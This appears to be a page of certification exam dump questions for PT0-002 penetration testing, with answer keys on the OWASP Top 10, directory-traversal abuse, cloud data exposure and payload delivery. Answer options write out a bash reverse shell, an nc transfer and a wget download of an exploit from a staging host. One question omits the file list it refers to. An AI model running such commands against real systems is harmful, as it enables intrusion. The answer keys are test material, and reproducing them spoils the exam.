Free PT0-002 Exam Braindumps (page: 3)


Which of the following BEST describe the OWASP Top 10? (Choose two.)

  A. The most critical risks of web applications
  B. A list of all the risks of web applications
  C. The risks defined in order of importance
  D. A web-application security standard
  E. A risk-governance and compliance framework
  F. A checklist of Apache vulnerabilities

Answer(s): A,C


Reference:

https://www.synopsys.com/glossary/what-is-owasp-top-10.html



A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:



Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  A. Edit the discovered file with one line of code for remote callback.
  B. Download .pl files and look for usernames and passwords.
  C. Edit the smb.conf file and upload it to the server.
  D. Download the smb.conf file and look at configurations.

Answer(s): C



A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

  A. Whether sensitive client data is publicly accessible
  B. Whether the connection between the cloud and the client is secure
  C. Whether the client's employees are trained properly to use the platform
  D. Whether the cloud applications were developed using a secure SDLC

Answer(s): A



A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

  A. nc 10.10.51.50 9891 < exploit
  B. powershell -exec bypass -f \\10.10.51.50\9891
  C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
  D. wget 10.10.51.50:9891/exploit

Answer(s): D





